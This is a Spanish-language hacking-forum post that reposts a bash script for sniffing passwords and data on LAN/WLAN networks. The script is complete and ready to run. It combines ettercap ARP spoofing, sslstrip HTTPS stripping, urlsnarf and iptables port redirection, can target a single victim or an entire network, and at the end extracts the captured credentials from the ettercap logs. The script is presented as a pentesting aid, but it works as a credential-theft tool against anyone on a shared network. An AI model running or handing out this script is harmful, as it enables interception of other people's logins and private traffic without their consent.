elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Scrip para Sniffear pass y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Scrip para Sniffear pass y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf  (Leído 6,779 veces)
r00ty

Desconectado Desconectado

Mensajes: 21


Ver Perfil
Scrip para Sniffear pass y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf
« en: 1 Diciembre 2010, 06:31 am »

Sniffeando contraseñas y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf

(No vi nada en las reglas sobre esto, si estoy cometiendo alguna falta les pido disculpas y que el moderador corrija o borre el tema)

Encontre este articulo en un foro que proporciona una herramienta muy buena para hacer sniffing de datos sobre las redes lan/wan, fue publicado en el foro de bactrack-linux.org por Teddy Strand, y fue traducido con la herramienta microsoft translator y otras partes por mi persona, los codigos no fueron modificados para su correcta ejecucion.  

La publicacion es la siguiente:

Estoy cansado de escribir comandos indefinidamente mientras hago pentest a mi red. Así que empecé a escribir scritps para cualquier cosa que hago. Este script es el que utilizo en su mayoría.
Aún soy muy nuevo en BackTrack/Linux, pero esta secuencia de comandos realmente funciona para mí y seguro que otros principiantes pueden hacer buen uso de el.

En primer lugar, asegurate de que la configuracion de etter.conf  tenga el valor por defecto. Tu etter.conf se encuentra en /etc/etter.conf - esta sección debe permanecer comentada:
Código:
# if you use iptables: 
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Esto es porque yo utilizo el ettercap para hacer el arpspoofing, pero no quiero que haga lo del certificado falso (tenemos el sslstrip para que haga el trabajo).

Guarda este código en un archivo de texto y nombralo como loquesea.sh (asegúrese de darle permisos de ejecutable con chmod +x loquesea.sh)

Código:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci

Este script ejecutara sslstrip + archivo de registro, urlsnarf (devolviendo todas las urls a un archivo de texto), ettercap con arpspoofing + archivos de registro (con las contraseñas) + un archivo pcap (para un mayor analisis). Todos los archivos son puestos en el mismo folder, con nombres identicos (claro que con diferente extension).

Por otra parte al salir correctamente del script (y ettercap) con la tecla "q", el script limpiara todo el solo (saliendo de sslstrip, urlsnarf y vaciando el iptables). Por ultimo lee automáticamente las contraseñas desde el archivo de registro de ettercap (.eci) y se ejecuta wireshark para un mayor análisis.

Tip: Para mí, la forma más sencilla de cargar imágenes desde un archivo pcap (que genera el script), es mediante el uso de NetworkMiner para windows. Se ejecuta sin problemas a través de wine, si lo ajustas un poco como muestra de este tutorial:
http://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html

Espero que les sea de ayuda.

Saludos
« Última modificación: 1 Diciembre 2010, 06:34 am por r00ty » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
HOW TO: Sniffing en Linux (Ettercap+SSLstrip+Driftnet) « 1 2 3 »
Hacking
mrfloffy 28 48,572 Último mensaje 31 Julio 2011, 16:44 pm
por necoreitor
WLAN, Ettercap y MSN messenger
Hacking
joansdf 5 11,941 Último mensaje 18 Enero 2010, 19:58 pm
por joansdf
Ettercap+Sslstrip « 1 2 »
Hacking
Goshin 17 21,776 Último mensaje 25 Septiembre 2010, 21:45 pm
por PyrOS-9889
ayuda ettercap+sslstrip
Hacking
wampis 3 6,007 Último mensaje 22 Septiembre 2011, 10:17 am
por ChimoC
Mitm con ettercap + sslstrip en VM Backtrack sobre Mac OS X
Hacking
astcorp 0 2,476 Último mensaje 13 Febrero 2014, 00:24 am
por astcorp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines